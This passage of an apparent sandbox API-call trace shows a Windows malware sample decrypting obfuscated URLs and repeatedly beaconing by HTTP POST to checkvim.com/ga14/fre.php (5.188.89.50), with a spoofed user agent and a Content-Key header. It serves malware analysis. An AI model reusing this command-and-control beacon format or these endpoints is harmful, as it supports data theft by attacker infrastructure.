FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c98*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0297.671] GetProcessHeap () returned 0x840000 [0297.671] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86ff90 [0297.671] GetProcessHeap () returned 0x840000 [0297.671] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0297.671] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0297.672] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0297.672] GetProcessHeap () returned 0x840000 [0297.672] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0297.672] GetProcessHeap () returned 0x840000 [0297.672] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0297.672] GetProcessHeap () returned 0x840000 [0297.672] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fd88 [0297.673] GetProcessHeap () returned 0x840000 [0297.673] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0297.673] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0297.674] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0297.674] GetProcessHeap () returned 0x840000 [0297.674] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0297.674] GetProcessHeap () returned 0x840000 [0297.674] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0297.674] send (s=0x4c4, buf=0x873a58*, len=237, flags=0) returned 237 [0297.674] send (s=0x4c4, buf=0x87eb58*, len=159, flags=0) returned 159 [0297.675] GetProcessHeap () returned 0x840000 [0297.675] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0297.675] recv (in: s=0x4c4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0298.008] GetProcessHeap () returned 0x840000 [0298.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0298.008] GetProcessHeap () returned 0x840000 [0298.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0298.008] GetProcessHeap () returned 0x840000 [0298.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0298.008] GetProcessHeap () returned 0x840000 [0298.008] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff90 | out: hHeap=0x840000) returned 1 [0298.008] closesocket (s=0x4c4) returned 0 [0298.009] GetProcessHeap () returned 0x840000 [0298.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b38 | out: hHeap=0x840000) returned 1 [0298.009] GetProcessHeap () returned 0x840000 [0298.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0298.009] GetProcessHeap () returned 0x840000 [0298.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7a0 | out: hHeap=0x840000) returned 1 [0298.009] GetProcessHeap () returned 0x840000 [0298.009] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0298.009] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1d0) returned 0x4c4 [0298.010] Sleep (dwMilliseconds=0xea60) [0298.023] GetProcessHeap () returned 0x840000 [0298.023] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb90 [0298.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.025] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0298.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.030] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0298.036] GetProcessHeap () returned 0x840000 [0298.036] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0298.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.037] CryptImportKey (in: hProv=0x86f8a8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e470) returned 1 [0298.037] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.038] CryptSetKeyParam (hKey=0x87e470, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0298.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.039] CryptSetKeyParam (hKey=0x87e470, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.039] GetProcessHeap () returned 0x840000 [0298.039] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0298.039] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.040] CryptDecrypt (in: hKey=0x87e470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb90, pdwDataLen=0x19f9a4 | out: pbData=0x87fb90, pdwDataLen=0x19f9a4) returned 1 [0298.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.045] CryptDestroyKey (hKey=0x87e470) returned 1 [0298.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.046] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0298.046] GetProcessHeap () returned 0x840000 [0298.046] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0298.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.047] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0298.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.048] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0298.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.049] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0298.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.050] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0298.050] GetProcessHeap () returned 0x840000 [0298.050] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0298.050] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0298.050] GetProcessHeap () returned 0x840000 [0298.050] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0298.050] GetProcessHeap () returned 0x840000 [0298.050] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0298.050] GetProcessHeap () returned 0x840000 [0298.050] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb90 | out: hHeap=0x840000) returned 1 [0298.051] GetProcessHeap () returned 0x840000 [0298.051] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f758 [0298.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.051] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0298.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.057] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0298.063] GetProcessHeap () returned 0x840000 [0298.063] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0298.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.064] CryptImportKey (in: hProv=0x86f248, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0298.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.065] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0298.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.065] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.066] GetProcessHeap () returned 0x840000 [0298.066] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0298.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.066] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f758, pdwDataLen=0x19f9a4 | out: pbData=0x87f758, pdwDataLen=0x19f9a4) returned 1 [0298.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.067] CryptDestroyKey (hKey=0x87e270) returned 1 [0298.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.068] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0298.068] GetProcessHeap () returned 0x840000 [0298.068] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0298.069] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.069] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0298.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.070] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0298.071] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.071] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0298.071] GetProcessHeap () returned 0x840000 [0298.071] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0298.071] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0298.074] GetProcessHeap () returned 0x840000 [0298.074] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871be8 [0298.074] socket (af=2, type=1, protocol=6) returned 0x4c8 [0298.075] connect (s=0x4c8, name=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0298.150] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b78*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0298.150] GetProcessHeap () returned 0x840000 [0298.150] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fac8 [0298.150] GetProcessHeap () returned 0x840000 [0298.150] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0298.151] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0298.151] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0298.151] GetProcessHeap () returned 0x840000 [0298.151] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0298.151] GetProcessHeap () returned 0x840000 [0298.151] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0298.151] GetProcessHeap () returned 0x840000 [0298.151] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc68 [0298.151] GetProcessHeap () returned 0x840000 [0298.152] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0298.152] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0298.153] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0298.153] GetProcessHeap () returned 0x840000 [0298.153] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0298.153] GetProcessHeap () returned 0x840000 [0298.153] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0298.153] send (s=0x4c8, buf=0x873a58*, len=237, flags=0) returned 237 [0298.153] send (s=0x4c8, buf=0x87eb58*, len=159, flags=0) returned 159 [0298.153] GetProcessHeap () returned 0x840000 [0298.153] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0298.153] recv (in: s=0x4c8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0298.514] GetProcessHeap () returned 0x840000 [0298.514] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0298.514] GetProcessHeap () returned 0x840000 [0298.514] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0298.514] GetProcessHeap () returned 0x840000 [0298.514] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0298.514] GetProcessHeap () returned 0x840000 [0298.514] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fac8 | out: hHeap=0x840000) returned 1 [0298.514] closesocket (s=0x4c8) returned 0 [0298.515] GetProcessHeap () returned 0x840000 [0298.515] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0298.515] GetProcessHeap () returned 0x840000 [0298.515] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0298.515] GetProcessHeap () returned 0x840000 [0298.515] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f758 | out: hHeap=0x840000) returned 1 [0298.515] GetProcessHeap () returned 0x840000 [0298.515] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0298.515] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x648) returned 0x4c8 [0298.517] Sleep (dwMilliseconds=0xea60) [0298.519] GetProcessHeap () returned 0x840000 [0298.519] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f908 [0298.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.521] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0298.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.530] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0298.535] GetProcessHeap () returned 0x840000 [0298.535] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0298.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.536] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0298.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.537] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0298.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.538] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.538] GetProcessHeap () returned 0x840000 [0298.538] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0298.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.539] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f908, pdwDataLen=0x19f9a4 | out: pbData=0x87f908, pdwDataLen=0x19f9a4) returned 1 [0298.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.539] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0298.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.540] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0298.540] GetProcessHeap () returned 0x840000 [0298.540] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0298.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.541] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0298.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.542] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0298.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.543] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0298.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.544] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0298.544] GetProcessHeap () returned 0x840000 [0298.544] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0298.544] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0298.544] GetProcessHeap () returned 0x840000 [0298.544] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0298.544] GetProcessHeap () returned 0x840000 [0298.544] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0298.544] GetProcessHeap () returned 0x840000 [0298.544] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f908 | out: hHeap=0x840000) returned 1 [0298.544] GetProcessHeap () returned 0x840000 [0298.544] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0298.545] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.545] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0298.550] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.550] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f2d0) returned 1 [0298.557] GetProcessHeap () returned 0x840000 [0298.557] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0298.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.558] CryptImportKey (in: hProv=0x86f2d0, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0298.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.558] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0298.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.559] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0298.559] GetProcessHeap () returned 0x840000 [0298.559] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0298.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.560] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0298.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.561] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0298.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0298.562] CryptReleaseContext (hProv=0x86f2d0, dwFlags=0x0) returned 1 [0298.562] GetProcessHeap () returned 0x840000 [0298.562] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0298.562] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.562] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0298.563] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.563] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0298.564] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0298.564] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0298.564] GetProcessHeap () returned 0x840000 [0298.564] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871290 [0298.564] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a88*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0298.565] GetProcessHeap () returned 0x840000 [0298.565] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ba8 [0298.565] socket (af=2, type=1, protocol=6) returned 0x4cc [0298.565] connect (s=0x4cc, name=0x878a88*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0298.642] FreeAddrInfoW (pAddrInfo=0x871330*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a88*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0298.642] GetProcessHeap () returned 0x840000 [0298.642] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0298.642] GetProcessHeap () returned 0x840000 [0298.642] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8845b8 [0298.643] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0298.644] wvsprintfA (in: param_1=0x8845b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0298.644] GetProcessHeap () returned 0x840000 [0298.644] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0298.644] GetProcessHeap () returned 0x840000 [0298.644] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8845b8 | out: hHeap=0x840000) returned 1 [0298.645] GetProcessHeap () returned 0x840000 [0298.645] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fdd0 [0298.645] GetProcessHeap () returned 0x840000 [0298.645] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8845b8 [0298.646] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0298.647] wvsprintfA (in: param_1=0x8845b8, param_2="%sContent-Key: %X\r\nContent-Length: 